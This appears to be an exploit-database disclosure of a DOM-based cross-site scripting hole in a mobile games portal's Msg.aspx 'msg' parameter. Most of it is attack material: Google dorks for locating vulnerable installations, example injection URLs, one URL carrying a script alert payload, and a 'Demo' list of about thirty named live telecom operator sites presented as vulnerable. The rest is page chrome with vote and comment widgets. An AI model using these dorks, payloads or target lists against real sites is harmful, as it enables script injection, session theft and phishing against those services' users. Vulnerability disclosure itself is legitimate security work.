Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability

2016.07.12

Credit: Revlution Security

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:Default.aspx intext:gamesclub OR inurl:/Arabic/ intext:gamesclub OR inurl:/html5/ intext:gamesclub

# Exploit Title : Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability
# Application Name : Gamesclub Mobile Service over WAP/GPRS
# Exploit Author : (Revlution Security)
# Author Contact : localhost097@gmail.com
# Vulnerable Type : Cross Site Scripting
# Platform : ASP
# Date : 11/6/2016
# Google Dork: inurl:Default.aspx intext:gamesclub
inurl:/Arabic/ intext:gamesclub
inurl:/html5/ intext:gamesclub
# Example:
gamesclub.example/html5/Arabic/Msg.aspx?msg=<html>omer was here<html/>
gamesclub.example/Arabic/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/html5/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/Feature/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/Portal/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/HTML5/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/LWP/Msg.aspx?msg=
# Demo
https://games.vodacom.co.tz/HTML5/Msg.aspx?msg=
http://gamesclub.asiacell.com/html5/Arabic/Msg.aspx?msg=
http://nadialmarah.com/Arabic/Msg.aspx?msg=
http://gamesclub.sa.zain.com/Arabic/Msg.aspx?msg=
http://gamesclub.etisalat.ae/Arabic/Msg.aspx?msg=
http://gamesworld.mobily.com.sa/arabic/Msg.aspx?msg=
http://gamesclub.omantel.om/Arabic/Msg.aspx?msg=
http://gamesclub.ae/Arabic/Msg.aspx?msg=
http://www.stcgames.com/Arabic/Msg.aspx?msg=
http://www.vivagamesclub.com/html5/Html5Arabic/Msg.aspx?msg=
http://www.alacarte.ae/Arabic/Msg.aspx?msg=
http://www.yallanelaab.com/Arabic/Msg.aspx?msg=
http://imagery-store.etisalat.ae/Arabic/Msg.aspx?msg=
http://gamesclub.airtellive.mobi/GC/wap/msg.aspx?msg=
http://gamesclub.mobi/Feature/Msg.aspx?msg=
http://gamesclub.mimicromax.com/Portal/Msg.aspx?msg=
http://games.ng.airtellive.com/HTML5/Msg.aspx?msg=
http://smart.gamesclub.mobi/html5/Msg.aspx?msg=
http://gamex.gamesclub.mobi/html5/Msg.aspx?msg=
http://gamesclub.mtnonline.com/HTML5/Msg.aspx?msg=
http://k.games.etisalat.com.ng/html5?fca=62160&fdn=<script>alert('omer');</script>#
http://gamesclub.mtn.co.rw/HTML5/Msg.aspx?msg=
http://zamtelgames.co.zm/GL/Msg.aspx?msg=
http://52.22.41.84/mtnghana_gc/GL/Msg.aspx?msg=
http://games.safaricom.com/NewFeature/Msg.aspx?msg=
http://gamesclub.mtnzambia.com/GL/Msg.aspx?msg=
http://gamesclub.in/NzGamesClub/Wap/Msg.aspx?msg=
http://videostore.ng/GL/Msg.aspx?msg=
http://wap.nazara.com/Portal/Msg.aspx?msg=
http://m.djuzz.com/Portal/Msg.aspx?msg=
http://ru.mimicromax.com/LWP/Msg.aspx?msg=
http://bd.mimicromax.com/LWP/Msg.aspx?msg=

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability

Dork: inurl:Default.aspx intext:gamesclub OR inurl:/Arabic/ intext:gamesclub OR inurl:/html5/ intext:gamesclub

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.